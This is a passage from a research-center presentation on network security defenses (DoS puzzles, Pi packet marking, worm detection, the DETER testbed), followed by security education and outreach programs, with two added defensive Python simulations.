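The scanning host trips all three signals (30 distinct destinations, half of the attempts failing, none of them resolved through DNS) and is throttled to a burst of five new connections; the busy-but-ordinary host keeps its full rate. Rate limiting rather than blocking is what makes the containment tolerable in production: a false positive slows a host down instead of cutting it off, and a worm that has to wait a second per new victim is slowed by orders of magnitude.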

Page 72

Internet Indirection Infrastructure (i3)

[Diagram: the sender sends (id, data) into i3; the receiver R has registered the trigger (id, R), so i3 delivers (R, data). An attacker A who floods the victim V's trigger id_V hits the i3 node holding that trigger rather than V directly.]

Use backup triggers on other i3 nodes to mitigate DoS attacks

[Stoica]

Page 73

Ingress Rate Limiting w/ Client Puzzles

[Diagram: an adversary and a legitimate client both requesting service from a server that hands out puzzles]

Designing puzzle mechanisms to defend against
– Connection depletion attacks (TCP)
– Bandwidth exhaustion attacks (IP)

[Wang & Reiter]
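An added example of a client-puzzle exchange for the connection-depletion case, not the Wang & Reiter construction: the server hands out a stateless hash puzzle whose difficulty rises with its backlog, the client brute-forces it, and the server verifies in constant work whatever the difficulty. The server secret, the time-slot length and the load-to-difficulty mapping are assumptions of this example.

```python
import hashlib
import hmac

# Added example, not the Wang & Reiter puzzle construction: a stateless
# hash-reversal puzzle whose difficulty is raised with server load. The server
# secret, time-slot length and the load-to-difficulty mapping are assumptions.
SERVER_SECRET = hashlib.sha256(b"demo-server-secret").digest()   # constructed; use os.urandom(32) in practice
SLOT_S = 30          # a puzzle (and its solution) is valid for the current and previous slot
MAX_BITS = 16        # ~65k hashes for the client at full load


def difficulty_for_load(backlog, capacity):
    """Puzzles are free when the server is idle and get harder as the backlog fills."""
    util = backlog / capacity
    if util < 0.5:
        return 0
    return min(MAX_BITS, 4 + int((util - 0.5) * 2 * (MAX_BITS - 4)))


def _nonce(client_addr, slot, bits):
    # Binding address, slot and difficulty into the nonce lets the server verify
    # without remembering which puzzles it issued.
    msg = "%s|%d|%d" % (client_addr, slot, bits)
    return hmac.new(SERVER_SECRET, msg.encode(), hashlib.sha256).digest()


def _leading_zero_bits(digest):
    return 256 - int.from_bytes(digest, "big").bit_length()


def _meets(nonce, bits, x):
    return _leading_zero_bits(hashlib.sha256(nonce + x.to_bytes(8, "big")).digest()) >= bits


def issue_puzzle(client_addr, bits, now):
    """Server -> client: (nonce, bits). Costs the server one HMAC and no state."""
    return _nonce(client_addr, int(now) // SLOT_S, bits), bits


def solve_puzzle(nonce, bits, limit=1 << 24):
    """Client: brute-force x so SHA256(nonce || x) has `bits` leading zeros (~2^bits hashes)."""
    for x in range(limit):
        if _meets(nonce, bits, x):
            return x
    return None


def verify_solution(client_addr, bits, x, now):
    """Server: at most two HMACs and two hashes, regardless of difficulty."""
    if x is None:
        return False
    slot = int(now) // SLOT_S
    return any(_meets(_nonce(client_addr, slot - back, bits), bits, x) for back in (0, 1))


def demo():
    now = 1_000_000.0                 # fixed clock so the run is reproducible
    addr = "198.51.100.7"             # constructed client address
    bits = difficulty_for_load(backlog=75, capacity=100)
    nonce, _ = issue_puzzle(addr, bits, now)
    x = solve_puzzle(nonce, bits)
    return {
        "bits": bits,
        "solved": x is not None,
        "accepted": verify_solution(addr, bits, x, now),
        "accepted_next_slot": verify_solution(addr, bits, x, now + 31),
        # A solution to a 10-bit puzzle is worthless once load pushes the
        # demanded difficulty up: the nonce itself changes with `bits`.
        "rejected_when_harder": verify_solution(addr, 40, x, now),
        "idle_server_bits": difficulty_for_load(backlog=10, capacity=100),
        "full_server_bits": difficulty_for_load(backlog=100, capacity=100),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats a deployment has to handle that the example leaves out. Because verification is stateless, the same (address, solution) pair is accepted again for the whole two-slot window; either remember solved puzzles for that window or mix a per-connection fresh value into the nonce. And a puzzle can only protect a resource that is consumed after the check: it works for connection depletion, where the server checks before allocating state, but for bandwidth exhaustion the check has to run upstream of the saturated link, which is why the slide treats the IP case separately.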

Page 74

Pi Marking

Queue-based marking
– Routers "push" a mark into the IP Identification field

Marks can be used to filter …
– Unaffected by source address spoofing

… or returned to the source to use as a capability

[Yaar, Perrig, Song]
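An added simulation of the marking and filtering just described, not the Pi implementation of Yaar, Perrig and Song: each router shifts a few bits into the 16-bit Identification field, so a packet's mark depends on the path it took and not on the source address it claims, and the victim drops packets carrying marks it has seen on attack traffic. Pi derives a router's bits from a hash of router addresses; here the low two bits of a router's last octet stand in so the marks can be checked by hand. The paths and addresses are constructed.

```python
# Added example, not the Pi implementation from Yaar, Perrig and Song: a
# simulation of deterministic path marking in the 16-bit IP Identification
# field and of victim-side filtering on those marks. Pi derives each router's
# bits from a hash of router addresses; here the low two bits of a router's
# last octet stand in so the marks can be read by hand. Paths and addresses
# are constructed.
ID_BITS = 16
MARK_BITS = 2                       # bits each router pushes; 16/2 = 8 hops survive in the field
ID_MASK = (1 << ID_BITS) - 1


def router_bits(router_ip):
    return int(router_ip.rsplit(".", 1)[1]) & ((1 << MARK_BITS) - 1)


def mark_packet(path, src_ip, ip_id=0):
    """Each router shifts its bits in; the source address plays no part in the mark."""
    for router in path:
        ip_id = ((ip_id << MARK_BITS) | router_bits(router)) & ID_MASK
    return {"src": src_ip, "id": ip_id}


class PiFilter:
    """Victim drops packets whose mark it has seen on identified attack traffic."""
    def __init__(self):
        self.attack_marks = set()

    def learn_attack(self, packet):
        self.attack_marks.add(packet["id"])

    def accept(self, packet):
        return packet["id"] not in self.attack_marks


PATH_A = ["10.0.0.%d" % i for i in range(1, 9)]     # attacker's path: bits 1,2,3,0,1,2,3,0
PATH_B = ["10.0.%d.2" % i for i in range(1, 9)]     # legitimate client's path: bits 2,2,...,2
PATH_A_LONG = ["10.9.9.3"] + PATH_A                 # one extra upstream hop before PATH_A


def demo():
    victim = PiFilter()
    flood = [mark_packet(PATH_A, "203.0.113.%d" % n) for n in range(1, 6)]  # 5 spoofed sources
    victim.learn_attack(flood[0])       # one identified attack packet is enough
    return {
        "attack_mark": flood[0]["id"],
        "spoofed_floods_dropped": sum(1 for p in flood[1:] if not victim.accept(p)),
        "legit_accepted": victim.accept(mark_packet(PATH_B, "198.51.100.7")),
        # Only the last 8 hops fit in the field: a sender further upstream on the
        # same last 8 hops carries the same mark and is dropped with the attacker.
        "upstream_collateral": not victim.accept(mark_packet(PATH_A_LONG, "192.0.2.9")),
    }


if __name__ == "__main__":
    print(demo())
```

The first three results are the property the slide claims: four more spoofed packets on the attacker's path are dropped after a single identified one, while a client on a different path is untouched. The fourth is the limitation any victim-side mark filter inherits from the 16-bit field: with two bits per hop only the last eight routers are represented, so every legitimate sender whose route shares those eight hops with the attacker is filtered too, and a filter that learns marks from misclassified traffic turns that collateral damage into a DoS vector of its own.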

Page 75

Sting: Auto Worm Defense System

[Diagram: an incoming exploit is detected ("Exploit Detected!") and the defense reacts automatically]

[Brumley, Newsome, Song]

Page 76

TrafficComber

Distributed high-speed network monitoring system
– Efficiently detect new (global) traffic behavior
– Accurately identify malicious IP addresses & attack patterns

Focuses & components
– Streaming algorithm design: fast memory-efficient algorithms for high-speed links; new streaming algorithms for superspreader detection
– Machine learning, graph theory techniques: traffic correlation & anomaly detection; stepping-stone detection
– Privacy-preserving information sharing: new cryptographic algorithms/protocols; privacy-preserving set operations

[Blum, Gibbons, Kissner, Song, Venkataraman]

Page 77

Finding the Source of Worms

Attack reconstruction: identify communications that carry the attack forward
Attacker identification: pinpoint attack source(s)
Are these possibly feasible?

[Diagram: a host contact graph (hosts B through H with timestamped contacts t1 to t7) and the host attack tree derived from it]

[Sekar, Xie, Maltz, Reiter, Zhang]

Page 78

DETER (http://www.deterlab.net/)

Background
– Lack of large-scale experimental infrastructure
– Missing objective test data, traffic and metrics

Goals
– Facilitate scientific experimentation: establish a baseline for validation of new approaches; scientifically rigorous testing frameworks/methodologies; attack scenarios/simulators, topology generators, background traffic, monitoring/visualization tools
– Provide an open, safe platform for experimental approaches that involve breaking the network

"Real systems, Real code, Real attacks!"

Page 79

[Diagram: DETER testbed layout. Two clusters of experiment PCs (ISI cluster and UCB cluster) behind Cisco and Foundry switches joined by trunks; each cluster has its own control network, node serial line server and power controller; 'Boss' and 'User' servers (with a backup 'Boss' and backup 'User') hold the user files; the two control networks are connected across the Internet through IPsec tunnels behind firewalls (FW); users enter through a CE NIC.]

Page 80

Example DETER Topologies

Page 81

DETER Testbed Status

201 nodes now available!
– Expect to double in 2006

Experimental node OS:
– Standard OS: RedHat Linux 7.3 or FreeBSD 4.9
– New: Windows XP
– Users can load arbitrary code; in fact, the user has root access to all allocated nodes
– Secure process replaces the OS after each experiment
– Adding support to scrub disks after experiments

Funded by NSF CISE and DHS HSARPA
– Open to all researchers: gov't, industrial, and academic

Page 82

Network protocol analysis

Protocol analysis methods
– Model checking, automated tools
– Logical proof methods

Case studies
– 802.11i wireless networking
– IKE for IPsec
– VoIP: security additions to SIP

Work with standards organizations
– IEEE: contributed to the 802.11i standard
– IETF/IEEE: 802.16e metro area networking
– Wi-Fi Alliance: wireless access point registration

Education: course development, materials

Research challenges
– Extend applicability of tools, improve usability
– Fundamental science: protocol analysis and crypto
– Clean slate network design: what are better designs?

Page 83

Network Security

Huge field
– Many challenges
– Lots of different kinds of work, from network protocols to routing and congestion control

Outstanding opportunities
– GENI initiative for Internet redesign
– DETER testbed, industrial collaboration
– Network researchers at all TRUST sites

Drinking from a firehose

Page 84

Education

Sigurd Meldal (SJSU), Janos Sztipanovits (Vanderbilt)

Page 85

Education Vision

Trust education
– Part of technological and social literacy
– Central to technological and policy-making professional competency

Trust education integrates domains
– Trust solutions = policy options + technology options

Trust education within domains
– From engineering to the social sciences

Trust education cuts across education levels
– K-12, undergraduate programs, profession-oriented masters programs, research-oriented doctoral programs

Page 86

Education Implementation

Main activities
– Education Community Development (EDC)
– The TRUST Academy Online (TAO)
– Curriculum Development and Refinement
– TRUST Workshops

Page 87

Participants in the Ecosystem


Page 88

Knowledge Certification

Standardized knowledge units: National Information Assurance Training Standards (CNSS); NIETP Centers for Academic Excellence in IA Education

Assist in the broad adoption of such curricula.

Evaluate, adapt or substitute units or standards as indicated by domain requirements.

Page 89

Learning Technology Infrastructure

Established strong relationship between TRUST and VaNTH*
– Assessment methods and technology
– Learning technology

Challenge-based courses (design and delivery methods)

Adaptive learning and course delivery strategies, development of adaptive expertise

* Vanderbilt-Northwestern-Texas-Harvard/MIT Engineering Research Center

Page 90

Education Spotlight

TRUST Academy On-Line: TRUST Repository Project
– TRUST researchers, graduate students, VaNTH researchers
– Yuan Xue (ISIS-VU), Xiao Su (SJSU), Larry Howard (ISIS-VU), Sigurd Meldal (SJSU), Weider Yu (SJSU), Simon Shim (SJSU)

Page 91

TRUST Academy On-line

Aspects of support
– Collaborative, evolutionary design of adaptive learning experiences
– Instrumented enactment of designs with learners
– Design reflection by educators
– Online dissemination

Principal components
– Visual integrated design environment (CAPE)
– Design and content repository
– Interoperable delivery platform (eLMS)
– Dissemination portal (TAO)

Page 92

TAO Content

Web-based dissemination portal / content management system for
– Classroom resources: syllabi, lecture notes, readings, assessment materials, and instructor guides
– Re-targetable learning modules
– On-line learning resources: direct access to courseware for evaluation

Network Security Courseware
Yuan Xue (Vanderbilt), Xiao Su (SJSU)

Sources
– Vanderbilt's CS291 (Network Security)
– Stanford's CS259 (Security Analysis of Network Protocols)
– SJSU's CmpE209 (Network Security)

Network Security Course Modules
– How bad guys work: attacks from the hackers' perspective
– Cryptography: secret key, public key, hash functions
– Authentication protocols: key exchange protocols
– Network security standards: wireless security, IP security, SSL, ..

Page 93

General Steps

Content creation; presentation & packaging; learning strategy formalization; delivery methods; evangelization and dissemination

Challenges
– Bringing in the policy-oriented educators
– Bringing in the non-CS engineering disciplines
– Evangelizing

Page 94

Undergraduate Curriculum Refinement & Development

Develop (new) material for (new) domains
Collect course material and teaching experiences from the TRUST partners
Identify knowledge units; generate retargetable learning modules
Define appropriate taxonomic structures

Page 95

Facilitate Adoption of New Material

Security science (incremental, integrative, learning modules)
– In-discipline: operating systems, programming languages, cryptography, secure networking, hardware architectures… Canonical security courses
– Cross-discipline: social impact, law, privacy, organizational roles, infrastructure
– Case studies as vehicle for learning modules

Social sciences (incremental, integrative, learning modules)
– In-discipline: privacy, information management and security, economics, organization theory, IP
– Cross-discipline: fundamentals of security technologies, technology awareness

General education: TRUST as a core competency for the educated person

Systems science (new capstone courses)
– Cross-discipline: design and analysis of complex systems

Courseware repository
– Web-deliverable courseware: VaNTH/eLMS

Page 96

Graduate Curriculum Refinement & Development

New courses will be jointly developed:
– Design and Analysis of Secure Systems
– Integrative Systems Science

Advanced graduate seminars

Computer and system security laboratory
– Team competitions

New courses designed for an engineering audience; joint offering across partners using web-cast technology

Page 97

Repository Content

Retargetable learning modules
– Elements of the learning process

Courses
– Teach security in a context

Page 98

Learning Module Repository

Facilitate efficient reuse of courseware
– Lectures
– Projects
– Homework assignments

Organized into small modules
– May be incorporated into other courses
– Example: the RSA module may be used in an algorithms class

Easy to adapt to different audiences
– Same topics covered by different instructors in different courses at different universities
– Example: cryptography

Facilitate designing course architectures
– The Lego approach to coursework design


Course Repository

Implement Course Repository in CAPE
– Specify taxonomy
– Define course learning objectives
– Simulate learning process via sequencing of course modules
– Include relevant resources in a course module: lecture notes, presentation slides, home assignments, projects, exams, quizzes

Web-based Delivery System
– Hosted by VaNTH from Vanderbilt University: https://try.elms.vanth.org


Ongoing Work

Pilot module sets
– Network security
– Introductory upper-division topics
– Security in chemical processing systems

Pilot experiment: design a course on the basis of the repository

Establishing a broader community
– Invite CERT, SEI, other IA institutions and initiatives to make use of the repository and authoring tools
– Establish a CSU-wide consortium for security curriculum development


TRUST Education Workshops

Engaging the broader teaching community: work with CERT, the IA Capability Building effort and minority serving institutions.

Immediate expectations:
– A TRUST/CERT sponsored participation in education conferences (proposal with CMU, UC Berkeley, Vanderbilt and SJSU to the annual FIE Conference series)
– A TRUST/SEI symposium following up on the SEI IA Education Summer Schools and the TRUST Summer Schools (proposal with SJSU and CMU/SEI under the NSF IACBP)


TRUST Workshops

Sensor Networking Workshop, Cornell and New York Department of Health - Tuesday, October 11, 2005.

Cornell-Tsinghua Workshop on Information Technology, November 18, Tsinghua University, Beijing, China.

TRUST Workshop on Social Security Numbers (jointly with PORTIA), Stanford - May 2006.


OUTREACH Strategy

We are engaged in two kinds of outreach activities:

Local activities, in which each local group runs its own outreach activities tailored to local conditions.

Overall Center activities, which engage the community at large. Here we are most concerned with how to disseminate our knowledge to the widest and most diverse population.


Local Activities

BFOIT - Berkeley Foundation for Opportunities in Information Technology http://www.bfoit.org/ (Nurturing underrepresented high school students and their teachers in TRUST areas. Prof. Bajcsy, personal participation and fund raising.)

SUPERB-IT - Summer Undergraduate Program in Engineering Research at Berkeley - Information Technology http://www.eecs.berkeley.edu/Programs/ugrad/superb/superb.html (Increased number of underrepresented students by 4)

SIPHER - Summer Internship Program in Hybrid and Embedded Software Research http://fountain.isis.vanderbilt.edu/fountain/Teaching/ (Increased number of underrepresented students by 2)

Pennsylvania Area HBCU Outreach - Historically Black Colleges and Universities http://is.hss.cmu.edu/summer.html (Increased number of underrepresented students by 5)


Center Activities: WISE

Women’s Institute in Summer Enrichment (WISE) is a residential summer program on the University of California, Berkeley campus that brings together women (though it is not restricted to women) from all disciplines who are interested in TRUSTed systems in science and technology and in the social, political, and economic ramifications associated with these systems.

Professors from across the country come to Berkeley to teach power courses in several disciplines, including computer science, economics, law, and electrical engineering. The one-week program includes rigorous classes in the morning, and allows participants to explore through hands-on experiments and team-based projects in the afternoons.


Application for the WISE program

Applications for summer 2006 are available on this website on the Application page (we shall shortly set this up). Our tuition fee for summer 2006 will be $1,500 -- applicants with financial need may request a fee waiver on the application form.

20 participants were selected from a nationwide applicant pool of young women and men who have demonstrated outstanding academic talent. No prior experience in computer programming, law, or engineering is required, but we expect students to be able to handle college-level material at a rapid pace. 19 out of the 20 participants are women (graduate students and junior faculty).


Faculty currently signed up for WISE

Name               Institution
Cynthia Dwork      Microsoft Palo Alto
Cynthia Irvine     Naval Postgraduate School
Gail Kaiser        Columbia University
Jeanette Wing      CMU
Joan Feigenbaum    Yale University
John Mitchell      Stanford University
Klara Nahrstedt    UIUC
Rebecca Wright     Stevens Institute of Technology
Sonia Fahmy        Purdue University
Stephen Mauer      UC Berkeley
Steve Weber        UC Berkeley
Yuan Xue           Vanderbilt


WISE Schedule

The workshop will be held on the UC Berkeley campus from July 5 to July 11, 2006, inclusive.

The summer school is organized into two parts: mornings, 3 hours of lectures; afternoons, 3 hours of exercises.

The lectures will be given by the faculty listed above; the exercises will be supervised by graduate students.


Center Activities: National Visibility

Participation in national conferences to build contacts and “get the word out”:

– Dr. W. Robinson from Vanderbilt University attended the NSF Joint Annual Meeting (HER), March 16-17, 2006, in Washington, DC. See: http://www.edjassociates.com/jam06

– Meltem Erol from UCB attended the HBCU conference in February 2006 in Baltimore, MD. See: http://www.hbcu-upconference.com/


Visiting positions

Cornell has funded Judy Cardell from Smith College to be engaged in the TRUST Sensor Networking project.

TRUST funded Weider Yu from SJSU to participate in CMU’s Information Assurance Capacity Building Program (IACBP).

Stanford will host Professor Mario Garcia from Texas A&M University-Corpus Christi this summer. The visit is sponsored by the NSF Quality Education for Minorities (QEM) Program.


Center Activities: National Visibility

Joint projects:

– Professor Bajcsy, together with Prof. Nahrstedt from UIUC, Prof. Wymur (UCB) and Prof. Katherine Mezure from Mills College, is building cyberinfrastructure for distributed dance performances in cyberspace.

– Professor Xue from Vanderbilt and Professor Xiao Su at SJSU worked on a pilot project on designing a network security courseware repository.


Other OUTREACH plans

Organize regular TRUST seminars, held weekly with speakers drawn from a pool of researchers engaged in the cyber security agenda.

Reach out to collaborate with the National Laboratories.

Recruit a diverse population of students as graduate students interested in the TRUST agenda.